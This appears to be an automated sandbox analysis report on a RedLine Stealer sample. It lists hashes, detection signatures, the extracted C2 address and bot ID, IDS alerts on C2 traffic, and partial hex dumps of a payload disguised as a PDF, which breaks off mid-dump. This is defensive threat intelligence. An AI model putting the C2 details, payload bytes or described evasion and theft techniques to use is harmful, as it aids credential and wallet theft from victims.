Windows Analysis Report
6RE1Z857ae.exe

Overview

General Information

Sample name: 6RE1Z857ae.exe
renamed because original name is a hash value
Original sample name: 3a1085797ca3089008cb2b51d2fcdc84.exe
Analysis ID: 1534363
MD5: 3a1085797ca3089008cb2b51d2fcdc84
SHA1: f5ea90ec6ad07f137c058ef2874dbd3a1b444f95
SHA256: 8fc221b7c8e3f52f22841c866cf0d842f2a1266e79b472273766ce1704474499
Tags: exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Downloads files with wrong headers with respect to MIME Content-Type
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses ipconfig to lookup or modify the Windows network settings
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe Avira: detection malicious, Label: HEUR/AGEN.1305500
Found malware configuration
Source: 5.0.build.exe.b30000.0.unpack Malware Configuration Extractor: RedLine {"C2 url": ["87.120.127.223:42128"], "Bot Id": "7772121777"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\build.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe ReversingLabs: Detection: 41%
Multi AV Scanner detection for submitted file
Source: 6RE1Z857ae.exe ReversingLabs: Detection: 45%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 6RE1Z857ae.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: 6RE1Z857ae.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log Jump to behavior
Source: 6RE1Z857ae.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 6RE1Z857ae.exe, 00000000.00000002.2204855208.0000000004011000.00000004.00000800.00020000.00000000.sdmp, 6RE1Z857ae.exe, 00000000.00000002.2215324588.0000000006BA0000.00000004.08000000.00040000.00000000.sdmp, 6RE1Z857ae.exe, 00000000.00000002.2197191438.0000000003112000.00000004.00000800.00020000.00000000.sdmp, 6RE1Z857ae.exe, 00000000.00000002.2204855208.00000000040B3000.00000004.00000800.00020000.00000000.sdmp, Adobe_Install_Updater.exe, 0000000C.00000002.2373598901.0000000002553000.00000004.00000800.00020000.00000000.sdmp, Adobe_Install_Updater.exe, 0000000C.00000002.2414867650.0000000003541000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2481916995.000000000418D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2481916995.0000000004099000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2441230781.0000000003324000.00000004.00000800.00020000.00000000.sdmp, Adobe_Install_Updater.exe, 00000014.00000002.2519401391.0000000003A31000.00000004.00000800.00020000.00000000.sdmp, Adobe_Install_Updater.exe, 00000014.00000002.2464667993.0000000002EB8000.00000004.00000800.00020000.00000000.sdmp, Plain_Checker.exe, 0000001B.00000002.2568610172.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Plain_Checker.exe, 0000001B.00000002.2568610172.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, Plain_Checker.exe, 0000001B.00000002.2540044072.0000000003136000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000022.00000002.2558260556.0000000003077000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000022.00000002.2627328007.0000000003F2B000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 00000036.00000002.2775307801.000000000290A000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 00000036.00000002.2805070631.00000000038E2000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 0000003A.00000002.2857282148.00000000025DF000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 0000003A.00000002.2898582474.0000000003622000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 6RE1Z857ae.exe, 6RE1Z857ae.exe, 00000000.00000002.2204855208.0000000004011000.00000004.00000800.00020000.00000000.sdmp, 6RE1Z857ae.exe, 00000000.00000002.2215324588.0000000006BA0000.00000004.08000000.00040000.00000000.sdmp, 6RE1Z857ae.exe, 00000000.00000002.2197191438.0000000003112000.00000004.00000800.00020000.00000000.sdmp, 6RE1Z857ae.exe, 00000000.00000002.2204855208.00000000040B3000.00000004.00000800.00020000.00000000.sdmp, Adobe_Install_Updater.exe, 0000000C.00000002.2373598901.0000000002553000.00000004.00000800.00020000.00000000.sdmp, Adobe_Install_Updater.exe, 0000000C.00000002.2414867650.0000000003541000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2481916995.000000000418D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2481916995.0000000004099000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2441230781.0000000003324000.00000004.00000800.00020000.00000000.sdmp, Adobe_Install_Updater.exe, 00000014.00000002.2519401391.0000000003A31000.00000004.00000800.00020000.00000000.sdmp, Adobe_Install_Updater.exe, 00000014.00000002.2464667993.0000000002EB8000.00000004.00000800.00020000.00000000.sdmp, Plain_Checker.exe, 0000001B.00000002.2568610172.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Plain_Checker.exe, 0000001B.00000002.2568610172.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, Plain_Checker.exe, 0000001B.00000002.2540044072.0000000003136000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000022.00000002.2558260556.0000000003077000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000022.00000002.2627328007.0000000003F2B000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 00000036.00000002.2775307801.000000000290A000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 00000036.00000002.2805070631.00000000038E2000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 0000003A.00000002.2857282148.00000000025DF000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 0000003A.00000002.2898582474.0000000003622000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000010.00000002.2441230781.0000000003324000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000022.00000002.2558260556.0000000003077000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: 6RE1Z857ae.exe, 00000000.00000002.2215032852.0000000006B10000.00000004.08000000.00040000.00000000.sdmp, 6RE1Z857ae.exe, 00000000.00000002.2204855208.0000000004296000.00000004.00000800.00020000.00000000.sdmp, 6RE1Z857ae.exe, 00000000.00000002.2204855208.0000000004163000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2481916995.0000000004099000.00000004.00000800.00020000.00000000.sdmp, Plain_Checker.exe, 0000001B.00000002.2568610172.0000000004021000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: 6RE1Z857ae.exe, 00000000.00000002.2215032852.0000000006B10000.00000004.08000000.00040000.00000000.sdmp, 6RE1Z857ae.exe, 00000000.00000002.2204855208.0000000004296000.00000004.00000800.00020000.00000000.sdmp, 6RE1Z857ae.exe, 00000000.00000002.2204855208.0000000004163000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2481916995.0000000004099000.00000004.00000800.00020000.00000000.sdmp, Plain_Checker.exe, 0000001B.00000002.2568610172.0000000004021000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000010.00000002.2441230781.0000000003324000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000022.00000002.2558260556.0000000003077000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: $jq'AwdWWK5AloC28paBhXS.PDbsRn56IGm56L3AWMn source: Plain_Checker.exe, 0000001B.00000002.2540044072.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 00000036.00000002.2775307801.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, Yftssfzf.exe, 0000003A.00000002.2857282148.00000000024E0000.00000004.00000800.00020000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Code function: 4x nop then jmp 05F33AC5h 0_2_05F33928
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Code function: 4x nop then jmp 05F33AC5h 0_2_05F33918
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Code function: 4x nop then jmp 05F33AC5h 0_2_05F33A1C
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Code function: 4x nop then jmp 06B66D14h 0_2_06B66C90
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Code function: 4x nop then jmp 06B66D14h 0_2_06B66C80
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 4x nop then jmp 05273AC5h 12_2_05273928
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 4x nop then jmp 05273AC5h 12_2_05273918
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 4x nop then jmp 05273AC5h 12_2_05273A1C
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 4x nop then jmp 06036D14h 12_2_06036C90
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 4x nop then jmp 06036D14h 12_2_06036C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05BFB124h 16_2_05BFAE40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05BFB124h 16_2_05BFAF28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05BFC7B5h 16_2_05BFC218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05BFB124h 16_2_05BFAE3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05BFC7B5h 16_2_05BFC218
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 4x nop then jmp 055D3AC5h 20_2_055D3918
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 4x nop then jmp 055D3AC5h 20_2_055D3928
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 4x nop then jmp 055D3AC5h 20_2_055D3A1C
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 4x nop then jmp 064D6D14h 20_2_064D6C90
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Code function: 4x nop then jmp 064D6D14h 20_2_064D6C80

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.5:49706 -> 87.120.127.223:42128
Source: Network traffic Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 87.120.127.223:42128 -> 192.168.2.5:49706
Source: Network traffic Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.5:49706 -> 87.120.127.223:42128
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 87.120.127.223:42128 -> 192.168.2.5:49706
Source: Network traffic Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 87.120.127.223:42128 -> 192.168.2.5:49706
Source: Network traffic Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.5:49735 -> 87.120.127.223:42128
Source: Network traffic Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.5:49809 -> 87.120.127.223:42128
Source: Network traffic Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 87.120.127.223:42128 -> 192.168.2.5:49809
Source: Network traffic Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.5:49809 -> 87.120.127.223:42128
Source: Network traffic Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 87.120.127.223:42128 -> 192.168.2.5:49809
Source: Network traffic Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.5:49867 -> 87.120.127.223:42128
Source: Network traffic Suricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.5:49877 -> 87.120.127.223:42128
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 87.120.127.223:42128
Downloads files with wrong headers with respect to MIME Content-Type
Source: http Bad PDF prefix: HTTP/1.1 200 OK Date: Tue, 15 Oct 2024 17:22:34 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Mon, 14 Oct 2024 03:21:37 GMT ETag: "132608-6246755adcbae" Accept-Ranges: bytes Content-Length: 1254920 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: 92 69 07 0f 5b c2 21 1c 90 29 a9 30 5a 9d 5d 11 ca 2a b6 34 da 58 ed 6a 96 bf 7f b9 d7 ab f5 26 58 23 ec 1f 4f 70 12 7e b5 34 0e 6c 22 6a 06 a9 df 8d 30 a2 80 f0 ec 64 dd 26 ed ea 59 18 0a 91 d3 fc e2 1d 44 32 ae c6 f3 7e 74 26 76 5a ee 84 eb 72 48 82 06 39 1f dc a4 04 69 11 ec 08 d5 f8 a8 79 61 b8 d3 43 05 b8 21 c3 13 26 72 23 91 11 ad ea db 9c c9 e9 56 40 d4 e3 94 c1 d3 2e 43 39 7c 49 43 e9 71 82 e1 18 c8 9d 31 36 26 7e 44 8b be c4 01 9f 77 66 97 a5 25 42 15 d6 eb fa 66 54 58 8e 47 94 6a 7c 58 c1 7f 11 65 cc 70 bd 86 7e d9 42 16 50 49 03 df 7d 51 71 29 ff eb 81 9c dc 3d 49 fe 11 ab 55 e8 f4 0d 58 1e 31 95 f9 bd be 8f ea 73 25 c4 12 63 cb 55 f2 32 f0 5a 29 8a ce df 8b f0 df a9 11 2c 39 85 0d 81 4e d9 b5 cf 32 91 69 80 5a 0a 93 9b 7c f4 a6 10 17 7d 3a b4 fb 9a 54 0e 4e 13 c0 61 09 87 0d d8 77 0c 73 53 78 5a 0b df 20 54 06 6c fd fa 0d 9c 55 d5 e1 b7 f0 01 1f 44 d1 cc e9 b8 ad a8 cc 3d 12 60 ef 7a e9 65 99 e1 8a 31 53 d4 18 c7 5b 5f 07 92 ef d3 ab 3a ff dc 58 7f ab f3 56 05 26 a5 83 e0 66 2f 23 5d 21 2e 17 15 09 8e ca 0f e9 7a 85 65 26 3d 2f a9 33 a6 50 3d 64 00 a8 a2 c1 e1 fb b7 1f ee 5d 48 b3 72 74 9c d9 2c 78 ba 89 01 ae 00 b6 49 bc 46 84 b4 b2 a9 a1 d5 5c c8 cf ab 27 b3 75 1f 78 77 87 17 13 a3 60 ab 52 51 e8 f9 bc 9d b4 48 1b 7d 2f 92 ad 8b 79 50 60 5d fe 7a c4 2a af ca f1 6a 46 2f a6 11 63 8b 47 28 1e 4b 70 38 38 06 19 45 bb 5f d0 f1 b1 9c 34 62 42 57 f7 b5 90 9b 7d 97 25 5d 4b 3b 52 05 7a b7 79 78 3a bd 8b 4a 14 a4 c5 d2 7a e6 b9 bd 7a 30 f9 87 b9 e1 28 47 86 0e 84 9e 76 a6 1d 22 55 b4 d9 38 e3 04 29 4f 69 4c f4 d0 b7 c6 2f 12 53 de f3 15 41 54 fb 73 27 3a 3f 3e 12 c2 d8 fd c4 98 60 47 5f c9 d3 e8 ac fd c0 12 c9 37 03 33 73 8d 8d 07 c8 3b 4e 01 57 ef 7f d0 68 3c 80 6e 45 02 18 4d eb f7 da 3e 01 af bf 93 8e db a2 88 52 a8 ee da 91 f1 00 24 79 9e 44 38 77 10 80 0d d3 1e d8 17 8c a1 c6 75 bf 73 c2 ee 94 59 45 4c c4 0b ed 6a c6 69 da 6b d3 f8 1b 5b 3c a7 d3 7a de dc 60 16 2d 13 58 97 a1 40 75 d7 ac c7 90 59 bd d6 84 44 52 a1 49 ee c8 9f 36 bd 05 0b 59 24 62 98 0f 3e f2 e5 9e 6f d7 39 93 e4 c8 0b d0 fa 72 98 d9 f6 7f f2 a4 77 db 13 d2 e7 d9 60 07 01 e4 73 d8 71 ad 49 56 bc 2c 28 97 a3 2c 2f fd b7 31 4d 00 52 9f 04 cc 53 38 1e a6 cf 4e ba 01 fa 44 1d d1 4d 07 52 9b c8 a5 4a f8 07 eb d0 84 2b d4 fd 2a 7a f2 9f d6 13 b5 a3 e1 5d 1a 5e 6f 41 27 d0 77 12 11 ed 75 1f 45 fe 01 db 09 72 f3 56 67 ba 59 1c 8f 49 ce 44 28 d4 a6 62 a1 07 02 44 3f 81 64 19 62 ad 0c 17 f6 42 f0 fa 61 e4 25 60 89 f7 be db 82 f2 cb d3 67 67 43 7c 7c b9 38 1b ba 06 8c 1d ec 94 ab 40 e7 c4 84 8c 45 82 86 91 0d 3d 90 7c 72 12 31 75 11 2d 8e 5a d5 39 6f f0 1b 69 6e 53 a3 74 ab 86 d9 a8 51 91 24 a6 aa da a6 58 ac 30 43 3c f4 e3 96 a6 92 27 29 69 ab bf 9a 10 f6 48 de e8 b
Source: http Bad PDF prefix: HTTP/1.1 200 OK Date: Tue, 15 Oct 2024 17:22:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Mon, 14 Oct 2024 03:21:37 GMT ETag: "132608-6246755adcbae" Accept-Ranges: bytes Content-Length: 1254920 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: 92 69 07 0f 5b c2 21 1c 90 29 a9 30 5a 9d 5d 11 ca 2a b6 34 da 58 ed 6a 96 bf 7f b9 d7 ab f5 26 58 23 ec 1f 4f 70 12 7e b5 34 0e 6c 22 6a 06 a9 df 8d 30 a2 80 f0 ec 64 dd 26 ed ea 59 18 0a 91 d3 fc e2 1d 44 32 ae c6 f3 7e 74 26 76 5a ee 84 eb 72 48 82 06 39 1f dc a4 04 69 11 ec 08 d5 f8 a8 79 61 b8 d3 43 05 b8 21 c3 13 26 72 23 91 11 ad ea db 9c c9 e9 56 40 d4 e3 94 c1 d3 2e 43 39 7c 49 43 e9 71 82 e1 18 c8 9d 31 36 26 7e 44 8b be c4 01 9f 77 66 97 a5 25 42 15 d6 eb fa 66 54 58 8e 47 94 6a 7c 58 c1 7f 11 65 cc 70 bd 86 7e d9 42 16 50 49 03 df 7d 51 71 29 ff eb 81 9c dc 3d 49 fe 11 ab 55 e8 f4 0d 58 1e 31 95 f9 bd be 8f ea 73 25 c4 12 63 cb 55 f2 32 f0 5a 29 8a ce df 8b f0 df a9 11 2c 39 85 0d 81 4e d9 b5 cf 32 91 69 80 5a 0a 93 9b 7c f4 a6 10 17 7d 3a b4 fb 9a 54 0e 4e 13 c0 61 09 87 0d d8 77 0c 73 53 78 5a 0b df 20 54 06 6c fd fa 0d 9c 55 d5 e1 b7 f0 01 1f 44 d1 cc e9 b8 ad a8 cc 3d 12 60 ef 7a e9 65 99 e1 8a 31 53 d4 18 c7 5b 5f 07 92 ef d3 ab 3a ff dc 58 7f ab f3 56 05 26 a5 83 e0 66 2f 23 5d 21 2e 17 15 09 8e ca 0f e9 7a 85 65 26 3d 2f a9 33 a6 50 3d 64 00 a8 a2 c1 e1 fb b7 1f ee 5d 48 b3 72 74 9c d9 2c 78 ba 89 01 ae 00 b6 49 bc 46 84 b4 b2 a9 a1 d5 5c c8 cf ab 27 b3 75 1f 78 77 87 17 13 a3 60 ab 52 51 e8 f9 bc 9d b4 48 1b 7d 2f 92 ad 8b 79 50 60 5d fe 7a c4 2a af ca f1 6a 46 2f a6 11 63 8b 47 28 1e 4b 70 38 38 06 19 45 bb 5f d0 f1 b1 9c 34 62 42 57 f7 b5 90 9b 7d 97 25 5d 4b 3b 52 05 7a b7 79 78 3a bd 8b 4a 14 a4 c5 d2 7a e6 b9 bd 7a 30 f9 87 b9 e1 28 47 86 0e 84 9e 76 a6 1d 22 55 b4 d9 38 e3 04 29 4f 69 4c f4 d0 b7 c6 2f 12 53 de f3 15 41 54 fb 73 27 3a 3f 3e 12 c2 d8 fd c4 98 60 47 5f c9 d3 e8 ac fd c0 12 c9 37 03 33 73 8d 8d 07 c8 3b 4e 01 57 ef 7f d0 68 3c 80 6e 45 02 18 4d eb f7 da 3e 01 af bf 93 8e db a2 88 52 a8 ee da 91 f1 00 24 79 9e 44 38 77 10 80 0d d3 1e d8 17 8c a1 c6 75 bf 73 c2 ee 94 59 45 4c c4 0b ed 6a c6 69 da 6b d3 f8 1b 5b 3c a7 d3 7a de dc 60 16 2d 13 58 97 a1 40 75 d7 ac c7 90 59 bd d6 84 44 52 a1 49 ee c8 9f 36 bd 05 0b 59 24 62 98 0f 3e f2 e5 9e 6f d7 39 93 e4 c8 0b d0 fa 72 98 d9 f6 7f f2 a4 77 db 13 d2 e7 d9 60 07 01 e4 73 d8 71 ad 49 56 bc 2c 28 97 a3 2c 2f fd b7 31 4d 00 52 9f 04 cc 53 38 1e a6 cf 4e ba 01 fa 44 1d d1 4d 07 52 9b c8 a5 4a f8 07 eb d0 84 2b d4 fd 2a 7a f2 9f d6 13 b5 a3 e1 5d 1a 5e 6f 41 27 d0 77 12 11 ed 75 1f 45 fe 01 db 09 72 f3 56 67 ba 59 1c 8f 49 ce 44 28 d4 a6 62 a1 07 02 44 3f 81 64 19 62 ad 0c 17 f6 42 f0 fa 61 e4 25 60 89 f7 be db 82 f2 cb d3 67 67 43 7c 7c b9 38 1b ba 06 8c 1d ec 94 ab 40 e7 c4 84 8c 45 82 86 91 0d 3d 90 7c 72 12 31 75 11 2d 8e 5a d5 39 6f f0 1b 69 6e 53 a3 74 ab 86 d9 a8 51 91 24 a6 aa da a6 58 ac 30 43 3c f4 e3 96 a6 92 27 29 69 ab bf 9a 10 f6 48 de e8 b
Source: http Bad PDF prefix: HTTP/1.1 200 OK Date: Tue, 15 Oct 2024 17:23:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Mon, 14 Oct 2024 03:21:37 GMT ETag: "132608-6246755adcbae" Accept-Ranges: bytes Content-Length: 1254920 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: 92 69 07 0f 5b c2 21 1c 90 29 a9 30 5a 9d 5d 11 ca 2a b6 34 da 58 ed 6a 96 bf 7f b9 d7 ab f5 26 58 23 ec 1f 4f 70 12 7e b5 34 0e 6c 22 6a 06 a9 df 8d 30 a2 80 f0 ec 64 dd 26 ed ea 59 18 0a 91 d3 fc e2 1d 44 32 ae c6 f3 7e 74 26 76 5a ee 84 eb 72 48 82 06 39 1f dc a4 04 69 11 ec 08 d5 f8 a8 79 61 b8 d3 43 05 b8 21 c3 13 26 72 23 91 11 ad ea db 9c c9 e9 56 40 d4 e3 94 c1 d3 2e 43 39 7c 49 43 e9 71 82 e1 18 c8 9d 31 36 26 7e 44 8b be c4 01 9f 77 66 97 a5 25 42 15 d6 eb fa 66 54 58 8e 47 94 6a 7c 58 c1 7f 11 65 cc 70 bd 86 7e d9 42 16 50 49 03 df 7d 51 71 29 ff eb 81 9c dc 3d 49 fe 11 ab 55 e8 f4 0d 58 1e 31 95 f9 bd be 8f ea 73 25 c4 12 63 cb 55 f2 32 f0 5a 29 8a ce df 8b f0 df a9 11 2c 39 85 0d 81 4e d9 b5 cf 32 91 69 80 5a 0a 93 9b 7c f4 a6 10 17 7d 3a b4 fb 9a 54 0e 4e 13 c0 61 09 87 0d d8 77 0c 73 53 78 5a 0b df 20 54 06 6c fd fa 0d 9c 55 d5 e1 b7 f0 01 1f 44 d1 cc e9 b8 ad a8 cc 3d 12 60 ef 7a e9 65 99 e1 8a 31 53 d4 18 c7 5b 5f 07 92 ef d3 ab 3a ff dc 58 7f ab f3 56 05 26 a5 83 e0 66 2f 23 5d 21 2e 17 15 09 8e ca 0f e9 7a 85 65 26 3d 2f a9 33 a6 50 3d 64 00 a8 a2 c1 e1 fb b7 1f ee 5d 48 b3 72 74 9c d9 2c 78 ba 89 01 ae 00 b6 49 bc 46 84 b4 b2 a9 a1 d5 5c c8 cf ab 27 b3 75 1f 78 77 87 17 13 a3 60 ab 52 51 e8 f9 bc 9d b4 48 1b 7d 2f 92 ad 8b 79 50 60 5d fe 7a c4 2a af ca f1 6a 46 2f a6 11 63 8b 47 28 1e 4b 70 38 38 06 19 45 bb 5f d0 f1 b1 9c 34 62 42 57 f7 b5 90 9b 7d 97 25 5d 4b 3b 52 05 7a b7 79 78 3a bd 8b 4a 14 a4 c5 d2 7a e6 b9 bd 7a 30 f9 87 b9 e1 28 47 86 0e 84 9e 76 a6 1d 22 55 b4 d9 38 e3 04 29 4f 69 4c f4 d0 b7 c6 2f 12 53 de f3 15 41 54 fb 73 27 3a 3f 3e 12 c2 d8 fd c4 98 60 47 5f c9 d3 e8 ac fd c0 12 c9 37 03 33 73 8d 8d 07 c8 3b 4e 01 57 ef 7f d0 68 3c 80 6e 45 02 18 4d eb f7 da 3e 01 af bf 93 8e db a2 88 52 a8 ee da 91 f1 00 24 79 9e 44 38 77 10 80 0d d3 1e d8 17 8c a1 c6 75 bf 73 c2 ee 94 59 45 4c c4 0b ed 6a c6 69 da 6b d3 f8 1b 5b 3c a7 d3 7a de dc 60 16 2d 13 58 97 a1 40 75 d7 ac c7 90 59 bd d6 84 44 52 a1 49 ee c8 9f 36 bd 05 0b 59 24 62 98 0f 3e f2 e5 9e 6f d7 39 93 e4 c8 0b d0 fa 72 98 d9 f6 7f f2 a4 77 db 13 d2 e7 d9 60 07 01 e4 